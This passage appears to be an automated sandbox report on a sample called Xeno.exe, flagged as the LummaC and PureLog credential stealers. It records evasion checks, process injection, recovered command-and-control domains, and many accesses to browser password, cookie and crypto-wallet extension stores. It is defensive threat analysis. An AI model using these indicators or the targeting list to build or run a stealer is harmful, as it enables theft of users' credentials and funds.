                      Source: C:\Users\user\Desktop\Xeno.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\Desktop\Xeno.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeWindow / User API: threadDelayed 6089Jump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exe TID: 4124Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exe TID: 1508Thread sleep count: 6089 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\Xeno.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Xeno.exeLast function: Thread delayed
                      Source: Amcache.hve.4.drBinary or memory string: VMware
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Xeno.exe, 00000001.00000002.2942807355.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, Xeno.exe, 00000001.00000002.2942665593.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\Xeno.exeAPI call chain: ExitProcess graph end nodegraph_1-13902
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043E7C0 LdrInitializeThunk,1_2_0043E7C0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 0_2_02F97F41 mov edi, dword ptr fs:[00000030h]0_2_02F97F41
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 0_2_02F980BE mov edi, dword ptr fs:[00000030h]0_2_02F980BE
                      Source: C:\Users\user\Desktop\Xeno.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 0_2_02F97F41 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02F97F41
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Xeno.exeMemory written: C:\Users\user\Desktop\Xeno.exe base: 400000 value starts with: 4D5AJump to behavior
                      LummaC encrypted strings found
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: growthselec.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immolatechallen.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crookedfoshe.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strivehelpeu.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sobrattyeu.bond
                      Source: C:\Users\user\Desktop\Xeno.exeProcess created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeQueries volume information: C:\Users\user\Desktop\Xeno.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Xeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                      Source: Xeno.exe, 00000001.00000002.2942776722.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                      Source: C:\Users\user\Desktop\Xeno.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: Xeno.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: Xeno.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Xeno.exe.b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Xeno.exe.3f99550.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Xeno.exe.3f99550.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
